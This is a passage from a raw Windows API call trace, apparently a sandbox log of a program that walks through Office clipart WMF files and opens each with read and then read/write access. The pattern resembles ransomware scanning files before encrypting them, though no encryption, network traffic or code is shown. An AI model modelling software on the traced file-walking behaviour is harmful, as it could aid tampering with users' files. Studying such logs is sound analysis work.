dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.079] AreFileApisANSI () returned 1 [0101.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0101.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 69 [0101.079] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd10)) returned 1 [0101.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0101.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0101.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0101.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.079] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x63c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN01044_.WMF", cAlternateFileName="")) returned 1 [0101.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0101.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0101.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0101.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0101.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0101.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0101.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0101.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0101.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0101.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0101.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0101.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0101.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0101.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0101.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0101.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.080] AreFileApisANSI () returned 1 [0101.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0101.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0101.080] AreFileApisANSI () returned 1 [0101.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0101.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 69 [0101.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.081] GetFileType (hFile=0x368) returned 0x1 [0101.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0101.081] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.081] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.082] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.082] CloseHandle (hObject=0x368) returned 1 [0101.082] AreFileApisANSI () returned 1 [0101.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0101.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 69 [0101.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.082] GetFileType (hFile=0x368) returned 0x1 [0101.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0101.082] CloseHandle (hObject=0x368) returned 1 [0101.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.084] AreFileApisANSI () returned 1 [0101.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a238 [0101.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 69 [0101.084] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x63c)) returned 1 [0101.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0101.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0101.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0101.084] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.084] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.084] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f20, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN01060_.WMF", cAlternateFileName="")) returned 1 [0101.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0101.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0101.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0101.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0101.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0101.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0101.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0101.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0101.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0101.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0101.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0101.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0101.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0101.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.085] AreFileApisANSI () returned 1 [0101.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0101.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0101.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.085] AreFileApisANSI () returned 1 [0101.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0101.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 69 [0101.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.085] GetFileType (hFile=0x368) returned 0x1 [0101.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0101.086] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.086] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.086] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.086] CloseHandle (hObject=0x368) returned 1 [0101.086] AreFileApisANSI () returned 1 [0101.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0101.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 69 [0101.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.087] GetFileType (hFile=0x368) returned 0x1 [0101.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0101.087] CloseHandle (hObject=0x368) returned 1 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0101.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0101.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 